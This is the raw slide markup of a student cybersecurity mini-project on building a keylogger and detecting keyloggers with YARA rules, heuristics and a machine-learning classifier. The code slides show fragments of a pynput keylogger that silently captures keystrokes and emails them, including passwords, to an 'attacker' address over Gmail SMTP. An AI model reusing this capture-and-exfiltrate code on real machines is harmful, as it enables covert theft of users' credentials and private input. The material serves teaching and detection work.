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91" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="304" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="315" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="287" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="290" r:id="rId3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1168400" y="708025"/>
            <a:ext cx="4535488" cy="3402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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915294" y="4343703"/>
            <a:ext cx="5027414" cy="409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e048d8f5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g28e048d8f5c_0_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e048d8f5c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g28e048d8f5c_0_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a1f637bf1_0_3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g26a1f637bf1_0_34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a1f637bf1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7" name="Google Shape;207;g26a1f637bf1_0_9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e048d8f5c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g28e048d8f5c_0_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a1f637bf1_0_3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g26a1f637bf1_0_33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a1f637bf1_0_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g26a1f637bf1_0_37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a1f637bf1_0_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g26a1f637bf1_0_38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a1f637bf1_0_3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g26a1f637bf1_0_38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a1f637bf1_0_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26a1f637bf1_0_40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a1f637bf1_0_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g26a1f637bf1_0_40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e048d8f5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g28e048d8f5c_0_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e048d8f5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g28e048d8f5c_0_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a1f637bf1_0_4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g26a1f637bf1_0_4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a1f637bf1_0_4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g26a1f637bf1_0_4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a1f637bf1_0_4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g26a1f637bf1_0_4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1f637bf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6a1f637bf1_0_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1f637bf1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g26a1f637bf1_0_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ac8a805b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g308ac8a805b_0_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8ac8a805b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g308ac8a805b_0_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a1f637bf1_0_3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g26a1f637bf1_0_3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a1f637bf1_0_3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g26a1f637bf1_0_33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1371600" y="6687979"/>
            <a:ext cx="59848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 panose="020F050202020403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SEC-  DEPARTMENT OF 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CSE(CS)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 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3-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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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MINIPROJECT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slide# -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457200" y="274638"/>
            <a:ext cx="8229600" cy="584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457200" y="1027113"/>
            <a:ext cx="8229600" cy="540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" name="Google Shape;19;p2" descr="C:\Users\ELCOT\Desktop\Saveetha Logo.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="26621" b="28150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588225" y="2899"/>
            <a:ext cx="2570075" cy="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en.wikipedia.org/wiki/Object-modeling_techniqu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MiniProject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</a:t>
            </a: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70</a:t>
            </a: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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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Review3</a:t>
            </a:r>
            <a:endParaRPr sz="4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28600" y="9906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IMPLEMENTING KEYLOGGING MALWARE </a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1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</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1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rgbClr val="538CD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DETECTING KEYLOGGING TECHNOLOGY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="538CD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sz="2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Submitted by:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lang="en-US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PERARASU M(212222100033)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endParaRPr lang="en-US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2022-2026 Batch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TEAM NO: 143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Under the guidance of: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ym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Dr . AUGUSTIAN ISAAC R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Assistant Professor,Department of AIML</a:t>
            </a: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marR="0" lvl="1" indent="-134620" algn="l" rtl="0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304800" y="5486400"/>
            <a:ext cx="982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3500" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="35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COMPUTER SCIENCE AND ENGINEERING(CYBERSECURITY)</a:t>
            </a:r>
            <a:endParaRPr sz="3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51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SAVEETHA ENGINEERING COLLEGE </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="51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(Autonomous Institution – UGC, Govt. of India)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(Affiliated to Anna University, Approved by AICTE - Accredited by NBA &amp; NAAC – ‘A’ Grade - ISO 9001:2015 Certified)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Saveetha Nagar, Thandalam, Chennai-602 105, TamilNadu, INDIA.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42950" marR="0" lvl="1" indent="-201295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91000" y="5105400"/>
            <a:ext cx="685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000"/>
              <a:buFont typeface="Calibri" panose="020F0502020204030204"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3760"/>
              <a:t>Architecture Diagram/Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="376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6565" y="1125855"/>
            <a:ext cx="8412480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Algorithms used</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p30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project uses following Algorithms:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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YARA Rules : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>YARA (Yet Another Recursive Acronym) is used to define and identify malware by creating rules based on patterns in code or file attributes.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Heuristic Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Heuristic algorithms evaluate the behavior of processes to identify malicious activity based on predefined rules and patterns.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Machine Learning Classification Algorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400" b="1"/>
              <a:t> : </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="2400" b="1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IN" altLang="en-US" sz="2400" b="1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Random Forest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>An ensemble learning method that builds multiple decision trees and merges them to improve accuracy.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Algorithms used</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p31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project uses following Algorithms:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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IN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Behaviour Based Algorithm :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 Monitors system activities and behaviors, such as unusual keystroke patterns or unexpected file access, to identify potential keylogging without relying on known signatures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr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/>
              <a:t>Application:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> Detects unusual keyboard activity, unexpected file access, or other behaviors indicative of keylogging.</a:t>
            </a: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IN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Signature Based Algorithm :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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 Uses predefined patterns and signatures of known keyloggers to identify and classify malware, enabling quick detection based on unique code sequences.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr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r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Application:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> YARA rules help detect known keyloggers by matching their specific signatures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr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lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-327660" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3459"/>
              <a:buChar char="–"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Hardware and software selection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122722" y="967339"/>
            <a:ext cx="9021300" cy="57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IN" altLang="en-US"/>
              <a:t>Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Visual Studio Code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Google Colab(Notebook)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Virustotal API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Python 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endParaRPr lang="en-US" sz="240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IN" altLang="en-US"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"/>
              <a:t>Libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Pynput(keyboards)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Sklearn,smtplib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Threading,psutil,time,logging,</a:t>
            </a:r>
            <a:endParaRPr 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Flask</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="2400"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IN" altLang="en-US" sz="2400"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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endParaRPr lang="en-US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✔"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>latform –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"/>
              <a:t>Linux(Kali),Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> 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Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p33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Programming Language and Libraries:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Used Python as the primary programming language for developing the keylogger and detection tool, utilizing libraries like Pynput for capturing keystrokes and YARA for signature detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="15240" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="133000"/>
              <a:buNone/>
            </a:pP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Keylogger Functionality:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Implemented features to silently log keystrokes and save them to a file, ensuring the keylogger operates discreetly in the background without alerting the user.</a:t>
            </a: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Detection Mechanisms:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Developed a detection tool that incorporates YARA rules for signature detection and heuristic analysis to monitor process behavior, providing a multi-layered approach to identify potential keyloggers.</a:t>
            </a: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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-327660" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="133000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>Machine Learning Model:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Trained a machine learning model (e.g., Random Forest or SVM) using labeled datasets of benign and malicious activities to improve the detection of unknown keyloggers based on behavioral patterns.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22" name="Google Shape;222;p34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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="133000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="1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Libraries</a:t>
            </a:r>
            <a:endParaRPr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smtplib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pynput import keyboard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email.mime.text import MIMEText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email.mime.multipart import MIMEMultipart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threading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time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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//Waiting for capture keystrokes//</a:t>
            </a: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 on_press(key):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global result, stop_listener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try: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with lock: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result += key.char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except AttributeError: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with lock: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if key == keyboard.Key.space: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result += " "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elif key == keyboard.Key.enter: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send_email_in_background(result)  # Send email when Enter key is pressed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result = ""  # Clear the result after sending email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elif key == keyboard.Key.esc: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stop_listener = True  # Stop the listener when Escape key is pressed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else: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result += f" {key} "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print(result)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28" name="Google Shape;228;p35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/>
          </a:bodyPr>
          <a:lstStyle/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endParaRPr lang="en-US"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//For send a keystrokes to author via mail//</a:t>
            </a:r>
            <a:endParaRPr sz="8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def send_email():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Email credentials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sender_email = "your_mail"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receiver_email = "your_mail"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password = "apppassword"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Email content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subject = "Captured Keyboard Input"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Create a MIMEText object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 = MIMEMultipart()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msg['From'] = sender_email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msg['To'] = receiver_email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msg['Subject'] = subject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Attach the body with the msg instance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msg.attach(MIMEText(body, 'plain'))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SMTP server configuration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smtp_server = "smtp.gmail.com"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port = 465  # For SSL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# Create a secure SSL context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print("Creating SSL context...")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context = smtplib.ssl.create_default_context()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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34" name="Google Shape;234;p3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//Python Libraries//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os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psutil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hashlib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time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logging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 threading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from flask import Flask, render_template, jsonify, request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//Main function//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__name__ == "__main__":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# Start Flask in a separate thread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flask_thread = threading.Thread(target=start_flask)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flask_thread.start()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# Start continuous keylogger monitoring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continuous_monitoring()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Important Code segments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p3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342900" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="30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//Getting Process details//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@app.route('/processes')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 get_processes():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# Sort process list by whether they are suspicious (red flag comes first)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sorted_process_list = sorted(process_list, key=lambda x: x['is_suspicious'], reverse=True)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return jsonify(processes=sorted_process_list)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//User Monitoring//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 continuous_monitoring():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while True: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detect_keylogger()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time.sleep(5)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19175"/>
            <a:ext cx="824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Output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3080" y="1645920"/>
            <a:ext cx="8239125" cy="772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Keylogger Output:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The keylogger captures and stores user keystrokes and sent to attacker ia email. This file includes  each captured keystroke for analysis.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2418080"/>
            <a:ext cx="8239125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103" name="Google Shape;103;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21971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 lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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Introduction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Statement of the Problem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Issues with Keylogging Attacks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Scope of the project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IN" altLang="en-US"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>evelopment Scope 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Detection Scope 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Methodology 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Architectural Diagram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Flow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Algorithm used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Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-35306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/>
              <a:t>Important code segments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Output, Results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Conclusions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Future work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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References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57200" y="1019175"/>
            <a:ext cx="824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Output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3080" y="1645920"/>
            <a:ext cx="8239125" cy="772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Keylogger Output:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The keylogger Malware captured keystrokes all are sent to the attacker mail, including password and sensitive information via email.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2418080"/>
            <a:ext cx="836295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55" name="Google Shape;255;p39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Detection Alerts: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The tool generates alerts when a keylogger is detected based on  signatures, heuristic analysis, or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Behaviour based</a:t>
            </a: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predictions.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070350" y="6164675"/>
            <a:ext cx="2393700" cy="33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View Review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2637790"/>
            <a:ext cx="8228965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Output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p39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</a:t>
            </a:r>
            <a:endParaRPr sz="24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0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/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Detection Alerts:GUI Display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42900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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Alert Messages for detected keyloggers.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lvl="0" indent="-342900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a: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Option to scan processes or view historical logs.</a:t>
            </a:r>
            <a:endParaRPr sz="2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3070350" y="6164675"/>
            <a:ext cx="2393700" cy="33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View Review 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Page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773045"/>
            <a:ext cx="829754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Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p43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b="1"/>
              <a:t>Keylogger malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1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Successful Keylogging Simulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="52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t>integrating signature-based</a:t>
            </a:r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Behaviour Based</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-299085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Background processes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600" y="2230755"/>
            <a:ext cx="8139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Effective Multi-Layered Detection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7965" y="4760595"/>
            <a:ext cx="6982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User-Friendly GUI and Real-Time Alerts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="5276850"/>
            <a:ext cx="4729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Real-time alerts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Detailed reports</a:t>
            </a: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SDG Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p43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600" b="1"/>
              <a:t>Sustainable Development Goals (SDGs) &amp; Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600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9: Industry, Innovation, and Infrastructure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Enhances digital infrastructure through advanced malware detection, fostering innovation in cybersecurity technologies.</a:t>
            </a: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16: Peace, Justice, and Strong Institutions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Strengthens digital security and privacy, ensuring safer online environments and building trust in digital systems.</a:t>
            </a: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4: Quality Education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Promotes cybersecurity education by advancing knowledge on keylogging detection and malware threats.</a:t>
            </a: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SDG 17: Partnerships for the Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3581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  Encourages collaboration between governments, industries, and academia to tackle cyber threats and protect global digital ecosystems.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600" y="2230755"/>
            <a:ext cx="8139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Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p44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457200" lvl="0" indent="-3683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800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The project titled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"Implementing Keylogging Malware and Detecting Keylogging Technology"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> addresses the critical challenge of identifying and mitigating keylogging malware in real-time environments. Keyloggers, whether used maliciously or for legitimate monitoring purposes, represent a significant threat to privacy and cybersecurity. Through the dual focus of this project, both the implementation of keyloggers and their detection mechanisms are explored in depth.</a:t>
            </a:r>
            <a:endParaRPr sz="2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800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>In conclusion, the project offers significant insights into how keyloggers operate and provides practical tools for their detection, enhancing system security and protecting sensitive data from unauthorized access. </a:t>
            </a:r>
            <a:endParaRPr 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Future Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p45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800"/>
              <a:t>Expand the tool to support multiple operating systems, including macOS , to enhance its usability across different platforms.</a:t>
            </a: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800"/>
              <a:t>Integrate real-time network traffic analysis to detect keyloggers that send captured data over the internet, further enhancing detection capabilities.</a:t>
            </a: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endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-26670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•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Implement more sophisticated models, such as deep learning techniques, to improve accuracy in identifying advanced and evolving keylogger patterns.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="76200" lvl="0" indent="0" algn="just" rtl="0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304" name="Google Shape;304;p4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0000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="34290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b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://www.crowdstrike.com/cybersecurity-101/attack-types/keylogger/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  &lt;Website Link&gt;</a:t>
            </a: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 b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0400D2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://securelist.com/keyloggers-how-they-work-and-how-to-detect-them-part-1/36138/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600" b="1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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;Website Link&gt;</a:t>
            </a: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altLang="en-US" sz="3600" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Paper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" u="sng">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Reference: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" u="sng"/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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Nikhil Ingle,Shreya Agnihotri ,Kavita Devi, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>KEYLOG SPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>",International Journel of Novel Research and Development (IJNRD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="3600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304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600" u="none" strike="noStrike" cap="none">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr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altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Soham P. Chinchalkar &amp; Rachna K. Somkunwar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ,”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>An Innovative Keylogger Detection System Using Machine Learning Algorithms and Dendritic Cell Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>",International Information and Engineering Technology Association</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="3600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304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altLang="en-US" sz="3600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3124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altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Arjun Singh, Pushpa Choudhary , Akhilesh kumar singh &amp; Dheerendra kumar tyagi ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"Keylogger Detection and Prevention"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,nternational Conference on Computational and Experimental Methods in Mechanical Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICCEMME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.doi:10.1088/1742-6596/2007/1/012005</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1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Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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32925" y="2292525"/>
            <a:ext cx="3753125" cy="24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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316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Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p16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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-327660" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="114000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2800"/>
              <a:t>Implementing Keylogger &amp; Detecting Keylogging Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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To implement a keylogging malware that demonstrates how attackers capture keystrokes and collect user information.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Keylogging malware is a type of malicious software that records every keystroke made by a user, often with the intent of stealing sensitive information such as passwords, credit card details, and personal data.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To develop a detection tool that identifies keyloggers using multiple methods, including YARA rules, behavioral heuristics, and ML-based analysis.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With the rise in cyberattacks, detecting keyloggers has become a critical challenge.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Advanced keyloggers can evade traditional antivirus solutions through techniques like obfuscation and stealth mode.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Statement of the Problem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
